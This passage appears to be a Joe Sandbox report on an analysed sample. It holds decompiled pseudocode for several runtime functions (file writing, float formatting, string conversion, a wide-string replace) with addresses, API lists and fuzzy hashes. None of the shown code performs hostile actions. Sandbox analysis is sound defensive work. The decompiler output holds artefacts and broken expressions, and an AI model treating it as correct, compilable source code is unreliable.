                                                                                                    0x0040f1bf
                                                                                                    0x0040f1c3
                                                                                                    0x0040f1c8
                                                                                                    0x0040f1cd
                                                                                                    0x0040f1d5
                                                                                                    0x0040f1e0
                                                                                                    0x0040f1e0
                                                                                                    0x0040f136
                                                                                                    0x0040f139
                                                                                                    0x0040f13d
                                                                                                    0x0040f141
                                                                                                    0x0040f148
                                                                                                    0x0040f14f
                                                                                                    0x0040f155
                                                                                                    0x0040f15b
                                                                                                    0x0040f15d
                                                                                                    0x0040f160
                                                                                                    0x0040f160
                                                                                                    0x0040f163
                                                                                                    0x0040f166
                                                                                                    0x0040f16d
                                                                                                    0x0040f16f
                                                                                                    0x0040f16f
                                                                                                    0x0040f173
                                                                                                    0x0040f17e
                                                                                                    0x0040f183
                                                                                                    0x0040f190
                                                                                                    0x0040f1a1
                                                                                                    0x0040f1a8
                                                                                                    0x0040f1b2
                                                                                                    0x0040f1b7
                                                                                                    0x0040f1bc
                                                                                                    0x0040f1bc
                                                                                                    0x00000000
                                                                                                    0x0040f1b2
                                                                                                    0x0040f157
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1421093161-0
                                                                                                    • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                    • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                                    • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                    • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004409B9(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                    				intOrPtr _t25;
                                                                                                    				void* _t26;
                                                                                                    
                                                                                                    				_t25 = _a16;
                                                                                                    				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                    					_t26 = E00440F28(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                    					goto L9;
                                                                                                    				} else {
                                                                                                    					_t35 = _t25 - 0x66;
                                                                                                    					if(_t25 != 0x66) {
                                                                                                    						__eflags = _t25 - 0x61;
                                                                                                    						if(_t25 == 0x61) {
                                                                                                    							L7:
                                                                                                    							_t26 = E00440A5D(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                    						} else {
                                                                                                    							__eflags = _t25 - 0x41;
                                                                                                    							if(__eflags == 0) {
                                                                                                    								goto L7;
                                                                                                    							} else {
                                                                                                    								_t26 = E004411DC(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                    							}
                                                                                                    						}
                                                                                                    						L9:
                                                                                                    						return _t26;
                                                                                                    					} else {
                                                                                                    						return E004410FD(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                                    					}
                                                                                                    				}
                                                                                                    			}





                                                                                                    0x004409bc
                                                                                                    0x004409c2
                                                                                                    0x00440a35
                                                                                                    0x00000000
                                                                                                    0x004409c9
                                                                                                    0x004409c9
                                                                                                    0x004409cc
                                                                                                    0x004409e7
                                                                                                    0x004409ea
                                                                                                    0x00440a0a
                                                                                                    0x00440a1c
                                                                                                    0x004409ec
                                                                                                    0x004409ec
                                                                                                    0x004409ef
                                                                                                    0x00000000
                                                                                                    0x004409f1
                                                                                                    0x00440a03
                                                                                                    0x00440a03
                                                                                                    0x004409ef
                                                                                                    0x00440a3a
                                                                                                    0x00440a3e
                                                                                                    0x004409ce
                                                                                                    0x004409e6
                                                                                                    0x004409e6
                                                                                                    0x004409cc

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                    • String ID:
                                                                                                    • API String ID: 3016257755-0
                                                                                                    • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                    • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                    • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                    • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 79%
                                                                                                    			E004127A0(WCHAR* __ecx, void* __edx) {
                                                                                                    				int _v8;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				short* _t12;
                                                                                                    				void* _t17;
                                                                                                    				char* _t18;
                                                                                                    				int _t21;
                                                                                                    
                                                                                                    				_t16 = __edx;
                                                                                                    				_push(__ecx);
                                                                                                    				_t12 = __ecx;
                                                                                                    				_push(_t17);
                                                                                                    				_t5 =  !=  ? 0xfde9 : 0;
                                                                                                    				_v8 =  !=  ? 0xfde9 : 0;
                                                                                                    				_t2 = lstrlenW(__ecx) + 1; // 0x1
                                                                                                    				_t21 = _t2;
                                                                                                    				_t18 = E00420C62(_t12, _t16, _t17, _t21);
                                                                                                    				E0042B420(_t18, 0, _t21);
                                                                                                    				WideCharToMultiByte(_v8, 0, _t12, 0xffffffff, _t18, _t21, 0, 0);
                                                                                                    				return _t18;
                                                                                                    			}










                                                                                                    0x004127a0
                                                                                                    0x004127a3
                                                                                                    0x004127a7
                                                                                                    0x004127b1
                                                                                                    0x004127b2
                                                                                                    0x004127b6
                                                                                                    0x004127bf
                                                                                                    0x004127bf
                                                                                                    0x004127c9
                                                                                                    0x004127ce
                                                                                                    0x004127e4
                                                                                                    0x004127f2

                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                    • _malloc.LIBCMT ref: 004127C3
                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00540000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                    • _memset.LIBCMT ref: 004127CE
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2824100046-0
                                                                                                    • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                                    • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                    • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                                    • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 77%
                                                                                                    			E00414920(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
                                                                                                    				intOrPtr _v8;
                                                                                                    				signed int _v12;
                                                                                                    				signed int _t128;
                                                                                                    				intOrPtr _t134;
                                                                                                    				intOrPtr* _t137;
                                                                                                    				intOrPtr _t140;
                                                                                                    				signed int _t144;
                                                                                                    				intOrPtr* _t146;
                                                                                                    				intOrPtr _t149;
                                                                                                    				intOrPtr _t153;
                                                                                                    				intOrPtr _t158;
                                                                                                    				intOrPtr _t163;
                                                                                                    				intOrPtr _t164;
                                                                                                    				intOrPtr* _t165;
                                                                                                    				intOrPtr _t167;
                                                                                                    				intOrPtr _t171;
                                                                                                    				intOrPtr _t191;
                                                                                                    				signed int _t194;
                                                                                                    				intOrPtr* _t195;
                                                                                                    				intOrPtr _t196;
                                                                                                    				intOrPtr* _t200;
                                                                                                    				signed int _t203;
                                                                                                    				intOrPtr _t204;
                                                                                                    				intOrPtr* _t205;
                                                                                                    				intOrPtr _t207;
                                                                                                    				intOrPtr* _t208;
                                                                                                    				intOrPtr* _t210;
                                                                                                    				signed int _t212;
                                                                                                    				intOrPtr* _t213;
                                                                                                    				intOrPtr* _t217;
                                                                                                    				intOrPtr* _t221;
                                                                                                    				intOrPtr* _t223;
                                                                                                    				intOrPtr* _t224;
                                                                                                    				signed int _t226;
                                                                                                    				intOrPtr* _t231;
                                                                                                    				void* _t232;
                                                                                                    				intOrPtr* _t235;
                                                                                                    				intOrPtr* _t237;
                                                                                                    				intOrPtr* _t240;
                                                                                                    				intOrPtr* _t241;
                                                                                                    				signed int _t244;
                                                                                                    				signed int _t246;
                                                                                                    				signed int _t247;
                                                                                                    				intOrPtr* _t251;
                                                                                                    				void* _t258;
                                                                                                    				void* _t259;
                                                                                                    
                                                                                                    				_t200 = __ecx;
                                                                                                    				_t259 = _t258 - 8;
                                                                                                    				_t251 = __ecx;
                                                                                                    				_t244 = _a4;
                                                                                                    				_t128 =  *(__ecx + 0x10);
                                                                                                    				if(_t128 < _t244) {
                                                                                                    					L86:
                                                                                                    					_push("invalid string position");
                                                                                                    					E0044F26C(__eflags);
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					return  *((intOrPtr*)(_t200 + 0x10));
                                                                                                    				} else {
                                                                                                    					_t226 = _a16;
                                                                                                    					_t200 =  *((intOrPtr*)(_a12 + 0x10));
                                                                                                    					if(_t200 < _t226) {
                                                                                                    						goto L86;
                                                                                                    					} else {
                                                                                                    						_v8 = _t128 - _t244;
                                                                                                    						_t191 = _a8;
                                                                                                    						_t192 =  <  ? _v8 : _t191;
                                                                                                    						_v12 = _t200 - _t226;
                                                                                                    						_a8 =  <  ? _v8 : _t191;
                                                                                                    						_t200 =  <  ? _v12 : _a20;
                                                                                                    						_t194 = _t128 - _a8;
                                                                                                    						_v12 = _t194;
                                                                                                    						_t195 = _a12;
                                                                                                    						_a20 = _t200;
                                                                                                    						if((_t128 | 0xffffffff) - _t200 <= _t194) {
                                                                                                    							_push("string too long");
                                                                                                    							E0044F23E(__eflags);
                                                                                                    							goto L86;
                                                                                                    						} else {
                                                                                                    							_t134 = _a8;
                                                                                                    							_t246 = _v12 + _t200;
                                                                                                    							_v8 = _v8 - _t134;
                                                                                                    							_v12 = _t246;
                                                                                                    							_t247 = _a4;
                                                                                                    							if( *(__ecx + 0x10) < _t246) {
                                                                                                    								E00415D50(_t195, __ecx, _t247, __ecx, _v12, 0);
                                                                                                    								_t200 = _a20;
                                                                                                    								_t226 = _a16;
                                                                                                    								_t134 = _a8;
                                                                                                    							}
                                                                                                    							if(_t251 == _t195) {
                                                                                                    								_t196 = _a20;
                                                                                                    								__eflags = _t196 - _t134;
                                                                                                    								if(_t196 > _t134) {
                                                                                                    									__eflags = _t226 - _t247;
                                                                                                    									if(_t226 > _t247) {
                                                                                                    										_t203 = _t247 + _t134;
                                                                                                    										_a4 = _t203;
                                                                                                    										__eflags = _t203 - _t226;
                                                                                                    										if(_t203 > _t226) {
                                                                                                    											_t204 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                                    											__eflags = _t204 - 8;
                                                                                                    											if(_t204 < 8) {
                                                                                                    												_a12 = _t251;
                                                                                                    											} else {
                                                                                                    												_a12 =  *_t251;
                                                                                                    												_t196 = _a20;
                                                                                                    											}
                                                                                                    											__eflags = _t204 - 8;
                                                                                                    											if(_t204 < 8) {
                                                                                                    												_t205 = _t251;
                                                                                                    											} else {
                                                                                                    												_t205 =  *_t251;
                                                                                                    											}
                                                                                                    											E0040B600(_t205 + _t247 * 2, _a12 + _t226 * 2, _t134);
                                                                                                    											_t207 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                                    											__eflags = _t207 - 8;
                                                                                                    											if(_t207 < 8) {
                                                                                                    												_t137 = _t251;
                                                                                                    											} else {
                                                                                                    												_t137 =  *_t251;
                                                                                                    											}
                                                                                                    											__eflags = _t207 - 8;
                                                                                                    											if(_t207 < 8) {
                                                                                                    												_t208 = _t251;
                                                                                                    											} else {
                                                                                                    												_t208 =  *_t251;
                                                                                                    											}
                                                                                                    											_a20 = _a4 + _a4;
                                                                                                    											E0040B600(_t208 + (_t247 + _t196) * 2, _a4 + _a4 + _t137, _v8);
                                                                                                    											_t140 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                                    											__eflags = _t140 - 8;
                                                                                                    											if(_t140 < 8) {
                                                                                                    												_t231 = _t251;
                                                                                                    											} else {
                                                                                                    												_t231 =  *_t251;
                                                                                                    											}
                                                                                                    											__eflags = _t140 - 8;
                                                                                                    											if(_t140 < 8) {
                                                                                                    												_t210 = _t251;
                                                                                                    											} else {
                                                                                                    												_t210 =  *_t251;
                                                                                                    											}
                                                                                                    											_push(_t196 - _a8);
                                                                                                    											_t144 = _a16 + _t196;
                                                                                                    											_t211 = _t210 + _a20;
                                                                                                    											__eflags = _t210 + _a20;
                                                                                                    										} else {
                                                                                                    											_t149 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                                    											__eflags = _t149 - 8;
                                                                                                    											if(_t149 < 8) {
                                                                                                    												_t235 = _t251;
                                                                                                    											} else {
                                                                                                    												_t235 =  *_t251;
                                                                                                    											}
                                                                                                    											__eflags = _t149 - 8;
                                                                                                    											if(_t149 < 8) {
                                                                                                    												_t213 = _t251;
                                                                                                    											} else {
                                                                                                    												_t213 =  *_t251;
                                                                                                    											}
                                                                                                    											E0040B600(_t213 + (_t247 + _t196) * 2, _t235 + _a4 * 2, _v8);
                                                                                                    											_t153 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                                    											__eflags = _t153 - 8;
                                                                                                    											if(_t153 < 8) {
                                                                                                    												_t231 = _t251;
                                                                                                    											} else {
                                                                                                    												_t231 =  *_t251;
                                                                                                    											}
                                                                                                    											__eflags = _t153 - 8;
                                                                                                    											if(_t153 < 8) {
                                                                                                    												_push(_t196);
                                                                                                    												_t144 = _a16 - _a8 + _t196;
                                                                                                    												_t211 = _t251 + _t247 * 2;
                                                                                                    											} else {
                                                                                                    												_push(_t196);
                                                                                                    												_t144 = _a16 - _a8 + _t196;
                                                                                                    												_t211 =  *_t251 + _t247 * 2;
                                                                                                    											}
                                                                                                    										}
                                                                                                    									} else {
                                                                                                    										_t158 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                                    										__eflags = _t158 - 8;
                                                                                                    										if(_t158 < 8) {
                                                                                                    											_t237 = _t251;
                                                                                                    										} else {
                                                                                                    											_t237 =  *_t251;
                                                                                                    										}
                                                                                                    										__eflags = _t158 - 8;
                                                                                                    										if(_t158 < 8) {
                                                                                                    											_t217 = _t251;
                                                                                                    										} else {
                                                                                                    											_t217 =  *_t251;
                                                                                                    										}
                                                                                                    										E0040B600(_t217 + (_t247 + _t196) * 2, _t237 + (_a8 + _t247) * 2, _v8);
                                                                                                    										_t163 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                                    										__eflags = _t163 - 8;
                                                                                                    										if(_t163 < 8) {
                                                                                                    											_t231 = _t251;
                                                                                                    										} else {
                                                                                                    											_t231 =  *_t251;
                                                                                                    										}
                                                                                                    										__eflags = _t163 - 8;
                                                                                                    										if(_t163 < 8) {
                                                                                                    											_t144 = _a16;
                                                                                                    											_push(_t196);
                                                                                                    											_t211 = _t251 + _t247 * 2;
                                                                                                    										} else {
                                                                                                    											_t144 = _a16;
                                                                                                    											_push(_t196);
                                                                                                    											_t211 =  *_t251 + _t247 * 2;
                                                                                                    										}
                                                                                                    									}
                                                                                                    									_t232 = _t231 + _t144 * 2;
                                                                                                    								} else {
                                                                                                    									_t164 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                                    									__eflags = _t164 - 8;
                                                                                                    									if(_t164 < 8) {
                                                                                                    										_t221 = _t251;
                                                                                                    									} else {
                                                                                                    										_t221 =  *_t251;
                                                                                                    									}
                                                                                                    									__eflags = _t164 - 8;
                                                                                                    									if(_t164 < 8) {
                                                                                                    										_t165 = _t251;
                                                                                                    									} else {
                                                                                                    										_t165 =  *_t251;
                                                                                                    									}
                                                                                                    									E0040B600(_t165 + _t247 * 2, _t221 + _t226 * 2, _t196);
                                                                                                    									_t167 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                                    									__eflags = _t167 - 8;
                                                                                                    									if(_t167 < 8) {
                                                                                                    										_t240 = _t251;
                                                                                                    									} else {
                                                                                                    										_t240 =  *_t251;
                                                                                                    									}
                                                                                                    									__eflags = _t167 - 8;
                                                                                                    									if(_t167 < 8) {
                                                                                                    										_t223 = _t251;
                                                                                                    									} else {
                                                                                                    										_t223 =  *_t251;
                                                                                                    									}
                                                                                                    									_push(_v8);
                                                                                                    									_t232 = _t240 + (_a8 + _t247) * 2;
                                                                                                    									_t211 = _t223 + (_t247 + _t196) * 2;
                                                                                                    								}
                                                                                                    								E0040B600(_t211, _t232);
                                                                                                    							} else {
                                                                                                    								_t171 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                                    								if(_t171 < 8) {
                                                                                                    									_a4 = _t251;
                                                                                                    								} else {
                                                                                                    									_a4 =  *_t251;
                                                                                                    								}
                                                                                                    								if(_t171 < 8) {
                                                                                                    									_t241 = _t251;
                                                                                                    								} else {
                                                                                                    									_t241 =  *_t251;
                                                                                                    								}
                                                                                                    								_t172 = _v8;
                                                                                                    								if(_v8 != 0) {
                                                                                                    									E004205A0(_t241 + (_t247 + _t200) * 2, _a4 + (_a8 + _t247) * 2, _t172 + _t172);
                                                                                                    									_t195 = _a12;
                                                                                                    									_t259 = _t259 + 0xc;
                                                                                                    								}
                                                                                                    								if( *((intOrPtr*)(_t195 + 0x14)) >= 8) {
                                                                                                    									_t195 =  *_t195;
                                                                                                    								}
                                                                                                    								if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
                                                                                                    									_t224 = _t251;
                                                                                                    								} else {
                                                                                                    									_t224 =  *_t251;
                                                                                                    								}
                                                                                                    								_t173 = _a20;
                                                                                                    								if(_a20 != 0) {
                                                                                                    									E0042D8D0(_t224 + _t247 * 2, _t195 + _a16 * 2, _t173 + _t173);
                                                                                                    								}
                                                                                                    							}
                                                                                                    							_t212 = _v12;
                                                                                                    							 *(_t251 + 0x10) = _t212;
                                                                                                    							if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
                                                                                                    								_t146 = _t251;
                                                                                                    								__eflags = 0;
                                                                                                    								 *((short*)(_t146 + _t212 * 2)) = 0;
                                                                                                    								return _t146;
                                                                                                    							} else {
                                                                                                    								 *((short*)( *_t251 + _t212 * 2)) = 0;
                                                                                                    								return _t251;
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    				}
                                                                                                    			}

















































                                                                                                    0x00414920
                                                                                                    0x00414923
                                                                                                    0x00414927
                                                                                                    0x0041492a
                                                                                                    0x0041492d
                                                                                                    0x00414932
                                                                                                    0x00414c3d
                                                                                                    0x00414c3d
                                                                                                    0x00414c42
                                                                                                    0x00414c47
                                                                                                    0x00414c48
                                                                                                    0x00414c49
                                                                                                    0x00414c4a
                                                                                                    0x00414c4b
                                                                                                    0x00414c4c
                                                                                                    0x00414c4d
                                                                                                    0x00414c4e
                                                                                                    0x00414c4f
                                                                                                    0x00414c53
                                                                                                    0x00414938
                                                                                                    0x00414938
                                                                                                    0x0041493f
                                                                                                    0x00414944
                                                                                                    0x00000000
                                                                                                    0x0041494a
                                                                                                    0x0041494e
                                                                                                    0x00414951
                                                                                                    0x00414957
                                                                                                    0x0041495d
                                                                                                    0x00414966
                                                                                                    0x0041496b
                                                                                                    0x00414972
                                                                                                    0x00414977
                                                                                                    0x0041497c
                                                                                                    0x0041497f
                                                                                                    0x00414982
                                                                                                    0x00414c33
                                                                                                    0x00414c38
                                                                                                    0x00000000
                                                                                                    0x00414988
                                                                                                    0x0041498b
                                                                                                    0x0041498e
                                                                                                    0x00414990
                                                                                                    0x00414996
                                                                                                    0x00414999
                                                                                                    0x0041499c
                                                                                                    0x004149a5
                                                                                                    0x004149aa
                                                                                                    0x004149ad
                                                                                                    0x004149b0
                                                                                                    0x004149b0
                                                                                                    0x004149b5
                                                                                                    0x00414a36
                                                                                                    0x00414a39
                                                                                                    0x00414a3b
                                                                                                    0x00414a94
                                                                                                    0x00414a96
                                                                                                    0x00414af9
                                                                                                    0x00414afc
                                                                                                    0x00414aff
                                                                                                    0x00414b01
                                                                                                    0x00414b6c
                                                                                                    0x00414b6f
                                                                                                    0x00414b72
                                                                                                    0x00414b7e
                                                                                                    0x00414b74
                                                                                                    0x00414b76
                                                                                                    0x00414b79
                                                                                                    0x00414b79
                                                                                                    0x00414b81
                                                                                                    0x00414b84
                                                                                                    0x00414b8a
                                                                                                    0x00414b86
                                                                                                    0x00414b86
                                                                                                    0x00414b86
                                                                                                    0x00414b96
                                                                                                    0x00414b9b
                                                                                                    0x00414ba1
                                                                                                    0x00414ba4
                                                                                                    0x00414baa
                                                                                                    0x00414ba6
                                                                                                    0x00414ba6
                                                                                                    0x00414ba6
                                                                                                    0x00414bac
                                                                                                    0x00414baf
                                                                                                    0x00414bb5
                                                                                                    0x00414bb1
                                                                                                    0x00414bb1
                                                                                                    0x00414bb1
                                                                                                    0x00414bbf
                                                                                                    0x00414bca
                                                                                                    0x00414bcf
                                                                                                    0x00414bd5
                                                                                                    0x00414bd8
                                                                                                    0x00414bde
                                                                                                    0x00414bda
                                                                                                    0x00414bda
                                                                                                    0x00414bda
                                                                                                    0x00414be0
                                                                                                    0x00414be3
                                                                                                    0x00414be9
                                                                                                    0x00414be5
                                                                                                    0x00414be5
                                                                                                    0x00414be5
                                                                                                    0x00414bf0
                                                                                                    0x00414bf4
                                                                                                    0x00414bf6
                                                                                                    0x00414bf6
                                                                                                    0x00414b03
                                                                                                    0x00414b03
                                                                                                    0x00414b06
                                                                                                    0x00414b09
                                                                                                    0x00414b0f
                                                                                                    0x00414b0b
                                                                                                    0x00414b0b
                                                                                                    0x00414b0b
                                                                                                    0x00414b11
                                                                                                    0x00414b14
                                                                                                    0x00414b1a
                                                                                                    0x00414b16
                                                                                                    0x00414b16
                                                                                                    0x00414b16
                                                                                                    0x00414b2b
                                                                                                    0x00414b30
                                                                                                    0x00414b36
                                                                                                    0x00414b39
                                                                                                    0x00414b3f
                                                                                                    0x00414b3b
                                                                                                    0x00414b3b
                                                                                                    0x00414b3b
                                                                                                    0x00414b41
                                                                                                    0x00414b44
                                                                                                    0x00414b61
                                                                                                    0x00414b62
                                                                                                    0x00414b64
                                                                                                    0x00414b46
                                                                                                    0x00414b4e
                                                                                                    0x00414b4f
                                                                                                    0x00414b51
                                                                                                    0x00414b51
                                                                                                    0x00414b44
                                                                                                    0x00414a98
                                                                                                    0x00414a98
                                                                                                    0x00414a9b
                                                                                                    0x00414a9e
                                                                                                    0x00414aa4
                                                                                                    0x00414aa0
                                                                                                    0x00414aa0
                                                                                                    0x00414aa0
                                                                                                    0x00414aa6
                                                                                                    0x00414aa9
                                                                                                    0x00414aaf
                                                                                                    0x00414aab
                                                                                                    0x00414aab
                                                                                                    0x00414aab
                                                                                                    0x00414ac2
                                                                                                    0x00414ac7
                                                                                                    0x00414acd
                                                                                                    0x00414ad0
                                                                                                    0x00414ad6
                                                                                                    0x00414ad2
                                                                                                    0x00414ad2
                                                                                                    0x00414ad2
                                                                                                    0x00414ad8
                                                                                                    0x00414adb
                                                                                                    0x00414aeb
                                                                                                    0x00414af0
                                                                                                    0x00414af1
                                                                                                    0x00414add
                                                                                                    0x00414adf
                                                                                                    0x00414ae2
                                                                                                    0x00414ae3
                                                                                                    0x00414ae3
                                                                                                    0x00414adb
                                                                                                    0x00414bf9
                                                                                                    0x00414a3d
                                                                                                    0x00414a3d
                                                                                                    0x00414a40
                                                                                                    0x00414a43
                                                                                                    0x00414a49
                                                                                                    0x00414a45
                                                                                                    0x00414a45
                                                                                                    0x00414a45
                                                                                                    0x00414a4b
                                                                                                    0x00414a4e
                                                                                                    0x00414a54
                                                                                                    0x00414a50
                                                                                                    0x00414a50
                                                                                                    0x00414a50
                                                                                                    0x00414a5d
                                                                                                    0x00414a62
                                                                                                    0x00414a68
                                                                                                    0x00414a6b
                                                                                                    0x00414a71
                                                                                                    0x00414a6d
                                                                                                    0x00414a6d
                                                                                                    0x00414a6d
                                                                                                    0x00414a73
                                                                                                    0x00414a76
                                                                                                    0x00414a7c
                                                                                                    0x00414a78
                                                                                                    0x00414a78
                                                                                                    0x00414a78
                                                                                                    0x00414a81
                                                                                                    0x00414a86
                                                                                                    0x00414a8c
                                                                                                    0x00414a8c
                                                                                                    0x00414bfc
                                                                                                    0x004149b7
                                                                                                    0x004149b7
                                                                                                    0x004149bd
                                                                                                    0x004149c6
                                                                                                    0x004149bf
                                                                                                    0x004149c1
                                                                                                    0x004149c1
                                                                                                    0x004149cc
                                                                                                    0x004149d2
                                                                                                    0x004149ce
                                                                                                    0x004149ce
                                                                                                    0x004149ce
                                                                                                    0x004149d4
                                                                                                    0x004149d9
                                                                                                    0x004149f1
                                                                                                    0x004149f6
                                                                                                    0x004149f9
                                                                                                    0x004149f9
                                                                                                    0x00414a00
                                                                                                    0x00414a02
                                                                                                    0x00414a02
                                                                                                    0x00414a08
                                                                                                    0x00414a0e
                                                                                                    0x00414a0a
                                                                                                    0x00414a0a
                                                                                                    0x00414a0a
                                                                                                    0x00414a10
                                                                                                    0x00414a15
                                                                                                    0x00414a29
                                                                                                    0x00414a2e
                                                                                                    0x00414a15
                                                                                                    0x00414c08
                                                                                                    0x00414c0b
                                                                                                    0x00414c0f
                                                                                                    0x00414c23
                                                                                                    0x00414c25
                                                                                                    0x00414c29
                                                                                                    0x00414c30
                                                                                                    0x00414c11
                                                                                                    0x00414c16
                                                                                                    0x00414c20
                                                                                                    0x00414c20
                                                                                                    0x00414c0f
                                                                                                    0x00414982
                                                                                                    0x00414944

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memmove
                                                                                                    • String ID: invalid string position$string too long
                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                    • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                    • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                    • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                    • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                    Uniqueness

